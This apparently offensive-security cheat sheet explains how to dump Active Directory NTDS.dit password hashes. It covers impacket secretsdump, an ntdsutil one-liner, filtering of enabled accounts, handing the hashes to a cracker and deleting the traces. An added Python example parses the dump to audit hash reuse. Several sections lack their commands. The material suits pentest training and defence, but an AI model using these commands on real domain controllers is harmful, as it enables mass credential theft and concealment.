Dumping NTDS

Grab the NTDS File

  • Get the NTDS file using ntdsutil.exe → https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration

  • Find the secretsdump.py script from impacket (it will be at /usr/share/doc/python3-impacket/examples/ )

python secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile clientntds -hashes LMHASH:NTHASH -user-status LOCAL

  • Clean up the hashes using grep and cut, or whatever you want, so that the output only shows the domain users that are enabled. Something along the lines of:

grep Enabled clientntds.ntds | grep acme.com | cut -d " " -f1 > ntds.txt

  • Move the hashes to the cracker

  • Make sure you clean up everything (delete the shadow copy, and the ntds.dit and SYSTEM files)
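As an added example (not part of this page or of impacket), a Python version of the clean-up step that parses the -user-status output of secretsdump.py, returns the enabled accounts of a given domain (skipping machine accounts, which the grep pipeline keeps), and also reports the two hygiene findings a defender auditing their own domain wants from the same file: NT hashes shared by several enabled accounts (password reuse) and enabled accounts with an empty password. The sample lines and every hash in them are constructed placeholders.

```python
import re
from collections import defaultdict
# Constructed sample of secretsdump.py output produced with -user-status.
# Every hash below is a made-up placeholder, not a real credential.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
acme.com\\alice:1105:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222::: (status=Enabled)
acme.com\\bob:1106:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222::: (status=Enabled)
acme.com\\carol:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333::: (status=Disabled)
acme.com\\svc_backup:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Enabled)
acme.com\\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444::: (status=Enabled)
"""
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
# user:rid:lmhash:nthash::: with the optional " (status=...)" suffix that -user-status appends
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
    r"(?: \(status=(?P<status>Enabled|Disabled)\))?$"
)

def parse_dump(text):
    """Yield one dict per hash line; banners and error lines do not match and are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()

def enabled_users(text, domain):
    """Same selection as the grep/cut pipeline, minus machine accounts (names ending in $)."""
    return [
        e["user"] for e in parse_dump(text)
        if e["status"] == "Enabled"
        and e["user"].lower().startswith(domain.lower() + "\\")
        and not e["user"].endswith("$")
    ]

def audit(text):
    """Hygiene findings from the same dump: NT hashes reused across enabled accounts, and empty passwords."""
    by_nt = defaultdict(list)
    for e in parse_dump(text):
        if e["status"] == "Enabled":
            by_nt[e["nt"]].append(e["user"])
    reused = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return {"reused": reused, "empty_password": by_nt.get(EMPTY_NT, [])}

if __name__ == "__main__":
    print(enabled_users(SAMPLE, "acme.com"))
    print(audit(SAMPLE))
```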

No Credentials - ntdsutil

If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using the LOLBin ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can see that ntds.dit, as well as the SYSTEM and SECURITY registry hives, are dumped to c:\temp:

We can then dump password hashes offline with impacket:

No Credentials - diskshadow

On Windows Server 2008+, we can use diskshadow to grab the ntds.dit.

Create a diskshadow script instructing it to create a new shadow copy of the C: drive (where ntds.dit is located in our case) and expose it as drive Z:\

shadow.txt

...and now execute the following:

Below shows that the ntds.dit was extracted and placed into our c:\exfil folder:

Inside interactive diskshadow utility, clean up the shadow volume:

With Credentials

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely over RPC with impacket:

Using CME
